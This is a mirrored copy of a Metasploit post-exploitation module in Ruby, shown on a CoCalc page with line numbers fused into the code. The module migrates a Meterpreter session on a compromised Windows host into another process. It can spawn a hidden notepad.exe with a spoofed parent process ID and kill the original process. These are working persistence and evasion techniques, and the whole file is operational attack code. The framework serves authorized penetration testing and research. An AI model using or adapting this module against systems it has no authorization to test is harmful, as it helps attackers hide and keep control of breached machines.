CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/migrate.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Common7include Msf::Post::Windows::Process89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Manage Process Migration',14'Description' => %q{15This module will migrate a Meterpreter session from one process16to another. A given process PID to migrate to or the module can spawn one and17migrate to that newly spawned process.18},19'License' => MSF_LICENSE,20'Author' => [21'Carlos Perez <carlos_perez[at]darkoperator.com>',22'phra <https://iwantmore.pizza>'23],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ],26'Compat' => {27'Meterpreter' => {28'Commands' => %w[29core_migrate30stdapi_sys_config_getenv31stdapi_sys_process_attach32stdapi_sys_process_execute33stdapi_sys_process_kill34]35}36}37)38)3940register_options(41[42OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),43OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),44OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),45OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),46OptString.new('NAME', [false, 'Name of process to migrate to.']),47OptBool.new('KILL', [false, 'Kill original process for the session.', false])48]49)50end5152# Run Method for when run command is issued53def run54print_status("Running module against #{sysinfo['Computer']}")5556server = session.sys.process.open57original_pid = server.pid58print_status("Current server process: #{server.name} (#{server.pid})")5960target_pid = nil6162if datastore['SPAWN'] && (datastore['SPAWN'] != '')63target_pid = create_temp_proc64elsif datastore['PID'] && (datastore['PID'] != 0)65target_pid = datastore['PID']66elsif datastore['NAME'] && (datastore['NAME'] != '')67target_pid = session.sys.process[datastore['NAME']]68end6970if !target_pid || !has_pid?(target_pid)71print_error("Process #{target_pid} not found")72return73end7475begin76print_status("Migrating into #{target_pid}")77session.core.migrate(target_pid)78print_good("Successfully migrated into process #{target_pid}")79rescue ::Exception => e80print_error('Could not migrate into process')81print_error("Exception: #{e.class} : #{e}")82end8384if datastore['KILL']85print_status("Killing original process with PID #{original_pid}")86if has_pid?(original_pid)87session.sys.process.kill(original_pid)88print_good("Successfully killed process with PID #{original_pid}")89else90print_warning("PID #{original_pid} exited on its own")91end92end93end9495# Creates a temp notepad.exe to migrate to depending the architecture.96def create_temp_proc97target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']98cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)99100print_status('Spawning notepad.exe process to migrate into')101102if (target_ppid != 0) && !has_pid?(target_ppid)103print_error("Process #{target_ppid} not found")104return105elsif has_pid?(target_ppid)106print_status("Spoofing PPID #{target_ppid}")107end108109# run hidden110proc = session.sys.process.execute(cmd, nil, {111'Hidden' => true,112'ParentPid' => target_ppid113})114115return proc.pid116end117end118119120